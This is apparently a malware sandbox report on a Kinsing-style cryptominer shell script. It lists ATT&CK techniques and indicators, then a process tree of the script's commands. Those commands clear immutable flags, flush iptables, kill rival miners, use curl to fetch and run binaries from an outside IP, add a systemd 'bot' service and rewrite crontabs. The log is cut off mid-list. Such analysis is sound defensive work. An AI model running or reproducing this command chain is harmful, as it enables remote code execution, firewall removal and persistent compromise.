78276bd481a04c29109fbbd8313701e5b814165fa4b48515ec4489ccfda93107

execution persistence privilege_escalatio

description	ioc	Process
File opened for modification	/etc/ld.so.preload	063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
928	chmod
936	chmod
947	chmod
957	chmod
895	chmod
902	chmod
910	chmod
922	chmod
959	chmod
887	chmod

Flushes firewall rules 1 TTPs 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

pid	Process
733	iptables

Attempts to change immutable files 21 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
771	xargs
815	xargs
819	xargs
835	xargs
722	chattr
730	chattr
777	xargs
811	xargs
821	xargs
728	chattr
863	xargs
874	xargs
840	xargs
758	xargs
765	xargs
813	xargs
817	xargs
823	xargs
852	xargs
879	xargs
749	xargs

Creates/modifies Cron job 1 TTPs 50 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

Cron

persistence privilege_escalation

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.isTEdK	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.tykqeg	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.QCBN6e	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.SAyXsY	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.tN4NlV	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.du6YtK	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.xeUMsi	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.oElelU	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.GpIcnU	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.38PT9d	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.uFT7lH	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.wtX3wW	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.7DsFoU	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.AsvTro	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.h4Srtk	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.SLnyDg	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.gpXWG6	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.8r2n2p	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.fJFHM3	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.6Z2U5J	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.2dBxu4	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.gbfP7b	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.EtdfE6	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.0i3T7s	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.HPKLbk	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.sVg67Z	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.vezFca	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.zoxvyc	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.QygPNP	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.ePOFzO	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.bcZSIa	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.EapCVf	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.kHDso2	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.mODMuI	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.ImoAnt	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.MIo3jy	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.WkWSQS	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.QthVAF	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.WFkhFR	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.GJKQ4X	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.gnQvuW	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.oOphF0	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.EOdseF	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.DagAVn	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.KJIpzV	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.FjlVqL	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.cYpDN3	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.4BuZyN	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.q0brGA	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.7WdQgP	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Modifies systemd 2 TTPs 1 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

XDG Autostart Entries

T1547.013

Systemd Service

T1543.002

description	ioc	Process
File opened for modification	/lib/systemd/system/bot.service	063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh

Reads CPU attributes 1 TTPs 44 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Process Discovery 1 TTPs 5 IoCs

Adversaries may try to discover information about running processes.

Process Discovery

T1057

pid	Process
745	ps
807	ps
831	ps
836	ps
875	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/2/cmdline	pkill
File opened for reading	/proc/filesystems	ps
File opened for reading	/proc/19/status	ps
File opened for reading	/proc/5/status	pkill
File opened for reading	/proc/865/stat	ps
File opened for reading	/proc/371/cmdline	pkill
File opened for reading	/proc/36/status	pkill
File opened for reading	/proc/23/status	pkill
File opened for reading	/proc/68/status	pkill
File opened for reading	/proc/473/cmdline	pkill
File opened for reading	/proc/473/status	pkill
File opened for reading	/proc/4/status	pkill
File opened for reading	/proc/705/status	pkill
File opened for reading	/proc/702/status	pkill
File opened for reading	/proc/112/cmdline	pkill
File opened for reading	/proc/466/status	ps
File opened for reading	/proc/76/cmdline	pkill
File opened for reading	/proc/167/status	pkill
File opened for reading	/proc/702/cmdline	ps
File opened for reading	/proc/751/cmdline	ps
File opened for reading	/proc/15/cmdline	ps
File opened for reading	/proc/9/cmdline	pkill
File opened for reading	/proc/509/cmdline	pkill
File opened for reading	/proc/4/cmdline	pkill
File opened for reading	/proc/5/cmdline	pkill
File opened for reading	/proc/5/status	pkill
File opened for reading	/proc/373/cmdline	pkill
File opened for reading	/proc/17/status	pkill
File opened for reading	/proc/77/cmdline	pkill
File opened for reading	/proc/717/stat	ps
File opened for reading	/proc/16/cmdline	pkill
File opened for reading	/proc/76/cmdline	pkill
File opened for reading	/proc/706/cmdline	pkill
File opened for reading	/proc/713/status	pkill
File opened for reading	/proc/466/cmdline	pkill
File opened for reading	/proc/473/status	pkill
File opened for reading	/proc/373/cmdline	pkill
File opened for reading	/proc/73/stat	ps
File opened for reading	/proc/509/status	pkill
File opened for reading	/proc/142/status	pkill
File opened for reading	/proc/16/cmdline	pkill
File opened for reading	/proc/510/cmdline	pkill
File opened for reading	/proc/320/cmdline	pkill
File opened for reading	/proc/320/status	ps
File opened for reading	/proc/12/cmdline	pkill
File opened for reading	/proc/682/cmdline	pkill
File opened for reading	/proc/73/status	pkill
File opened for reading	/proc/77/cmdline	pkill
File opened for reading	/proc/228/cmdline	pkill
File opened for reading	/proc/751/status	pkill
File opened for reading	/proc/14/cmdline	pkill
File opened for reading	/proc/73/stat	ps
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/706/cmdline	pkill
File opened for reading	/proc/73/status	pkill
File opened for reading	/proc/103/stat	ps
File opened for reading	/proc/316/cmdline	pkill
File opened for reading	/proc/316/cmdline	ps
File opened for reading	/proc/405/status	ps
File opened for reading	/proc/73/cmdline	ps
File opened for reading	/proc/113/status	pkill
File opened for reading	/proc/321/status	pkill
File opened for reading	/proc/13/cmdline	pkill

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

System Network Configuration Discovery

T1016

pid	Process
713	063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
1072	sed

/tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
/tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
1⤵
- Modifies the dynamic linker configuration file
- Modifies systemd
- System Network Configuration Discovery
PID:713
- /usr/bin/chattr
  chattr -i /etc/ld.so.preload
  2⤵
  - Attempts to change immutable files
  PID:722
- /bin/rm
  rm -f /etc/ld.so.preload
  2⤵
  PID:725
- /usr/bin/chattr
  chattr -R -i /var/spool/cron
  2⤵
  - Attempts to change immutable files
  PID:728
- /usr/bin/chattr
  chattr -i /etc/crontab
  2⤵
  - Attempts to change immutable files
  PID:730
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:733
- /usr/bin/id
  id -u
  2⤵
  PID:737
- /bin/grep
  grep -e /dev
  2⤵
  PID:741
- /bin/ls
  ls -la /etc
  2⤵
  PID:740
- /bin/grep
  grep -v grep
  2⤵
  PID:742
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:745
- /bin/grep
  grep agetty
  2⤵
  PID:746
- /bin/grep
  grep -v grep
  2⤵
  PID:747
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:749
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:748
- /usr/bin/pkill
  pkill -f 42.112.28.216
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:752
- /bin/grep
  grep 207.38.87.6
  2⤵
  PID:754
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:755
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:756
- /bin/grep
  grep -v -
  2⤵
  PID:757
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:758
- /bin/grep
  grep 127.0.0.1:52018
  2⤵
  PID:761
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:762
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:763
- /bin/grep
  grep -v -
  2⤵
  PID:764
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:765
- /bin/grep
  grep 34.81.218.76:9486
  2⤵
  PID:767
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:768
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:769
- /bin/grep
  grep -v -
  2⤵
  PID:770
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:771
- /bin/grep
  grep 42.112.28.216:9486
  2⤵
  PID:773
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:774
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:775
- /bin/grep
  grep -v -
  2⤵
  PID:776
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:777
- /usr/bin/pkill
  pkill -f .git/kthreaddw
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:779
- /usr/bin/pkill
  pkill -f 80.211.206.105
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:780
- /usr/bin/pkill
  pkill -f 207.38.87.6
  2⤵
  - Reads CPU attributes
  PID:781
- /usr/bin/pkill
  pkill -f p8444
  2⤵
  - Reads CPU attributes
  PID:782
- /usr/bin/pkill
  pkill -f supportxmr
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:783
- /usr/bin/pkill
  pkill -f monero
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:784
- /usr/bin/pkill
  pkill -f kthreaddi
  2⤵
  - Reads CPU attributes
  PID:785
- /usr/bin/pkill
  pkill -f srv00
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:786
- /usr/bin/pkill
  pkill -f /tmp/.javae/javae
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:787
- /usr/bin/pkill
  pkill -f .javae
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:788
- /usr/bin/pkill
  pkill -f .syna
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:789
- /usr/bin/pkill
  pkill -f .main
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:790
- /usr/bin/pkill
  pkill -f xmm
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:791
- /usr/bin/pkill
  pkill -f solr.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:792
- /usr/bin/pkill
  pkill -f /tmp/.solr/solrd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:793
- /usr/bin/pkill
  pkill -f /tmp/javac
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:794
- /usr/bin/pkill
  pkill -f /tmp/.go.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:795
- /usr/bin/pkill
  pkill -f /tmp/.x/agetty
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:796
- /usr/bin/pkill
  pkill -f /tmp/.x/kworker
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:797
- /usr/bin/pkill
  pkill -f c3pool
  2⤵
  - Reads CPU attributes
  PID:798
- /usr/bin/pkill
  pkill -f /tmp/.X11-unix/gitag-ssh
  2⤵
  - Reads CPU attributes
  PID:799
- /usr/bin/pkill
  pkill -f /tmp/1
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:800
- /usr/bin/pkill
  pkill -f /tmp/okk.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:801
- /usr/bin/pkill
  pkill -f /tmp/gitaly
  2⤵
  - Reads CPU attributes
  PID:802
- /usr/bin/pkill
  pkill -f /tmp/.x/kworker
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:803
- /usr/bin/pkill
  pkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:804
- /usr/bin/pkill
  pkill -f /tmp/.X11-unix/supervise
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:805
- /usr/bin/pkill
  pkill -f /tmp/.ssh/redis.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:806
- /bin/grep
  grep ./udp
  2⤵
  PID:808
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:807
- /bin/grep
  grep -v grep
  2⤵
  PID:809
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:810
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:811
- /bin/cat
  cat /tmp/.X11-unix/01
  2⤵
  PID:812
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:813
- /bin/cat
  cat /tmp/.X11-unix/11
  2⤵
  PID:814
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:815
- /bin/cat
  cat /tmp/.X11-unix/22
  2⤵
  PID:816
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:817
- /bin/cat
  cat /tmp/.pg_stat.0
  2⤵
  PID:818
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:819
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:821
- /bin/cat
  cat /tmp/.pg_stat.1
  2⤵
  PID:820
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:823
- /bin/cat
  cat /data/./oka.pid
  2⤵
  PID:822
- /usr/bin/pkill
  pkill -f zsvc
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:824
- /usr/bin/pkill
  pkill -f pdefenderd
  2⤵
  - Reads CPU attributes
  PID:825
- /usr/bin/pkill
  pkill -f updatecheckerd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:826
- /usr/bin/pkill
  pkill -f cruner
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:827
- /usr/bin/pkill
  pkill -f dbused
  2⤵
  - Reads CPU attributes
  PID:828
- /usr/bin/pkill
  pkill -f bashirc
  2⤵
  - Reads CPU attributes
  PID:829
- /usr/bin/pkill
  pkill -f meminitsrv
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:830
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:831
- /bin/grep
  grep ./oka
  2⤵
  PID:832
- /bin/grep
  grep -v grep
  2⤵
  PID:833
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:834
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:835
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:836
- /bin/grep
  grep "postgres: autovacum"
  2⤵
  PID:837
- /bin/grep
  grep -v grep
  2⤵
  PID:838
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:839
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:840
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:841
- /usr/bin/awk
  awk "length(\$1) == 8"
  2⤵
  PID:842
- /bin/grep
  grep -v bin
  2⤵
  PID:843
- /bin/grep
  grep -v "\\["
  2⤵
  PID:844
- /bin/grep
  grep -v "("
  2⤵
  PID:845
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:846
- /bin/grep
  grep -v proxymap
  2⤵
  PID:847
- /bin/grep
  grep -v postgres
  2⤵
  PID:848
- /bin/grep
  grep -v postgrey
  2⤵
  PID:849
- /bin/grep
  grep -v kinsing
  2⤵
  PID:850
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:851
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:852
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:853
- /usr/bin/awk
  awk "length(\$1) == 16"
  2⤵
  PID:854
- /bin/grep
  grep -v bin
  2⤵
  PID:855
- /bin/grep
  grep -v "\\["
  2⤵
  PID:856
- /bin/grep
  grep -v "("
  2⤵
  PID:857
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:858
- /bin/grep
  grep -v proxymap
  2⤵
  PID:859
- /bin/grep
  grep -v postgres
  2⤵
  PID:860
- /bin/grep
  grep -v postgrey
  2⤵
  PID:861
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:862
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:863
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:864
- /usr/bin/awk
  awk "length(\$5) == 8"
  2⤵
  PID:865
- /bin/grep
  grep -v bin
  2⤵
  PID:866
- /bin/grep
  grep -v "\\["
  2⤵
  PID:867
- /bin/grep
  grep -v "("
  2⤵
  PID:868
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:869
- /bin/grep
  grep -v proxymap
  2⤵
  PID:870
- /bin/grep
  grep -v postgres
  2⤵
  PID:871
- /bin/grep
  grep -v postgrey
  2⤵
  PID:872
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:873
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:874
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:875
- /bin/grep
  grep -v grep
  2⤵
  PID:876
- /bin/grep
  grep /tmp/sscks
  2⤵
  PID:877
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:878
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:879
- /usr/bin/md5sum
  md5sum /etc/kinsing
  2⤵
  PID:884
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:885
- /bin/chmod
  chmod 777 /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:887
- /usr/bin/curl
  curl -o /etc/kinsing http://80.71.158.12/kinsing
  2⤵
  PID:889
- /bin/chmod
  chmod +x /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /usr/bin/md5sum
  md5sum /etc/kinsing
  2⤵
  PID:899
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:900
- /bin/chmod
  chmod 777 /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:902
- /usr/bin/curl
  curl -o /etc/kinsing http://80.71.158.12/kinsing
  2⤵
  PID:904
- /bin/chmod
  chmod +x /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:910
- /usr/bin/md5sum
  md5sum /etc/kinsing
  2⤵
  PID:914
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:915
- /usr/bin/md5sum
  md5sum /etc/libsystem.so
  2⤵
  PID:920
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:921
- /bin/chmod
  chmod 777 /etc/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:922
- /usr/bin/curl
  curl -o /etc/libsystem.so http://80.71.158.12/libsystem.so
  2⤵
  PID:924
- /bin/chmod
  chmod +x /etc/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:928
- /usr/bin/md5sum
  md5sum /etc/libsystem.so
  2⤵
  PID:933
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:934
- /bin/chmod
  chmod 777 /etc/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:936
- /usr/bin/curl
  curl -o /etc/libsystem.so http://80.71.158.12/libsystem.so
  2⤵
  PID:938
- /bin/chmod
  chmod +x /etc/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:947
- /usr/bin/md5sum
  md5sum /etc/libsystem.so
  2⤵
  PID:952
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:953
- /bin/rm
  rm -rf /tmp/kdevtmpfsi
  2⤵
  PID:955
- /bin/chmod
  chmod 777 /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:957
- /bin/chmod
  chmod +x /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:959
- /etc/kinsing
  /etc/kinsing
  2⤵
  PID:962
- /usr/bin/id
  id -u
  2⤵
  PID:964
- /bin/systemctl
  systemctl enable bot
  2⤵
  - Enumerates kernel/hardware configuration
  PID:965
- /bin/systemctl
  systemctl start bot
  2⤵
  - Enumerates kernel/hardware configuration
  PID:967
- /bin/sed
  sed /base64/d
  2⤵
  PID:969
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:968
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:970
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:971
- /bin/sed
  sed /_cron/d
  2⤵
  PID:972
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:973
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:974
- /bin/sed
  sed /31.210.20.181/d
  2⤵
  PID:975
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:976
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:977
- /bin/sed
  sed /update.sh/d
  2⤵
  PID:978
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:979
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:980
- /bin/sed
  sed /logo4/d
  2⤵
  PID:981
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:982
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:983
- /bin/sed
  sed /logo9/d
  2⤵
  PID:984
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:985
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:986
- /bin/sed
  sed /logo0/d
  2⤵
  PID:987
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:988
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:989
- /bin/sed
  sed /logo/d
  2⤵
  PID:990
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:991
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:992
- /bin/sed
  sed /tor2web/d
  2⤵
  PID:993
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:994
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:995
- /bin/sed
  sed /jpg/d
  2⤵
  PID:996
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:997
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:998
- /bin/sed
  sed /png/d
  2⤵
  PID:999
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1000
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1003
- /bin/sed
  sed /tmp/d
  2⤵
  PID:1002
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1001
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1004
- /bin/sed
  sed /zmreplchkr/d
  2⤵
  PID:1005
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1006
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1007
- /bin/sed
  sed /aliyun.one/d
  2⤵
  PID:1008
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1009
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1010
- /bin/sed
  sed /3.215.110.66.one/d
  2⤵
  PID:1011
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1012
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1013
- /bin/sed
  sed /pastebin/d
  2⤵
  PID:1014
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1015
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1016
- /bin/sed
  sed /onion/d
  2⤵
  PID:1017
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1018
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1019
- /bin/sed
  sed /lsd.systemten.org/d
  2⤵
  PID:1020
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1021
- /usr/bin/crontab
  crontab -l
  2⤵
